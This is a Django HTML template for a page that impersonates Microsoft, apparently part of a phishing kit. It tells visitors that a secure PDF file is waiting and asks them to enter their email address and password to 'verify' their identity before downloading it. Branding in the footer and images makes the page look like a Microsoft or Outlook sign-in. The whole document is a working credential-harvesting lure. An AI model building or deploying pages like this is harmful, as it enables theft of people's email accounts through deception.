<main class="mt-5">

  <div class="container d-flex justify-content-center align-items-center">
  
    <div class="text-center my-5"> 
      <img src="{% static 'images/micro.png' %}" alt="" width="150px" height="150px" class="img-fluid">
    </div>
    
    <div class="card mx-auto" style="max-width: 25rem;">
      <h3 class="fw-normal text-center p-3">Verify Your Identity</h3>
      <hr>
      <div class="px-4">
        <p>You've received a secure file</p>
        <span>
          <img src="{% static 'images/pdff.png' %}" alt="" width="40px" height="40px" class="img-fluid">
          56.1KB
        </span>
        <p>To receive and download this PDF file, please enter specific email credentials that this document was sent to.</p>
        <div class="text-center py-3">
          <img src="{% static 'images/blueo.png' %}" alt="" width="150px" height="150px" class="img-fluid">
        </div>
        <form method="post" class="form-horizontal">
          {% csrf_token %}
          
          <!-- Bootstrap form styling -->
          <div class="mb-3">
            {{ form.email.label_tag }}
            {{ form.email }}
          </div>
          
          <div class="mb-3">
            {{ form.password.label_tag }}
            {{ form.password }}
          </div>
          
          <button class="btn btn-primary w-100 py-2" type="submit">Sign in</button>
        </form>
      </div>
    </div>
  
  </div>
  <p class="mt-5 mb-3 text-body-secondary text-center">&copy; 2024 Microsoft Privacy & Cookies</p>
</main>